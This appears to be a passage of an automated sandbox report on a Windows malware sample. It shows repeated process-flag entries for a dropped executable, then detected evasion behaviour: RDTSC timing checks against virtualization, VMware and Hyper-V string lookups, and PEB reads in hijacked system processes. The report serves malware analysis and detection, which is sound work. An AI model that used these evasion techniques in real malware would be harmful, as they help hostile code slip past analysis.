          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000010418604 second address: 000000001041860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000001041899E second address: 00000000104189A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002D88604 second address: 0000000002D8860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002D8899E second address: 0000000002D889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E56DE6 rdtsc 1_2_06E56DE6
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 4.2 %
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02175B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02175B48
          Source: C:\Users\user\Desktop\0321423605241625.exeAPI call chain: ExitProcess graph end nodegraph_0-20130
          Source: C:\Users\user\Desktop\0321423605241625.exeAPI call chain: ExitProcess graph end nodegraph_0-20287
          Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.477730191.000000000ED50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.477730191.000000000ED50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}217G
          Source: explorer.exe, 00000002.00000000.312701350.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 0321423605241625.exe, 00000000.00000002.307257682.000000000083B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000000.333810974.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0X
          Source: explorer.exe, 00000002.00000000.387219526.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: Mwqrxeuz.exe, 00000003.00000002.542721424.000000000074D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 0321423605241625.exe, 00000000.00000002.307257682.000000000083B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02186388 InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualAlloc,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualAlloc,VirtualProtect,FreeLibrary,0_2_02186388
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E56DE6 rdtsc 1_2_06E56DE6
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E276E2 mov eax, dword ptr fs:[00000030h]1_2_06E276E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E416E0 mov ecx, dword ptr fs:[00000030h]1_2_06E416E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E58EC7 mov eax, dword ptr fs:[00000030h]1_2_06E58EC7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E436CC mov eax, dword ptr fs:[00000030h]1_2_06E436CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECFEC0 mov eax, dword ptr fs:[00000030h]1_2_06ECFEC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8ED6 mov eax, dword ptr fs:[00000030h]1_2_06EE8ED6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE0EA5 mov eax, dword ptr fs:[00000030h]1_2_06EE0EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE0EA5 mov eax, dword ptr fs:[00000030h]1_2_06EE0EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE0EA5 mov eax, dword ptr fs:[00000030h]1_2_06EE0EA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E946A7 mov eax, dword ptr fs:[00000030h]1_2_06E946A7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAFE87 mov eax, dword ptr fs:[00000030h]1_2_06EAFE87
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2766D mov eax, dword ptr fs:[00000030h]1_2_06E2766D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]1_2_06E3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]1_2_06E3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]1_2_06E3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]1_2_06E3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AE73 mov eax, dword ptr fs:[00000030h]1_2_06E3AE73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]1_2_06E27E41
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E27E41 mov eax, dword ptr fs:[00000030h]1_2_06E27E41
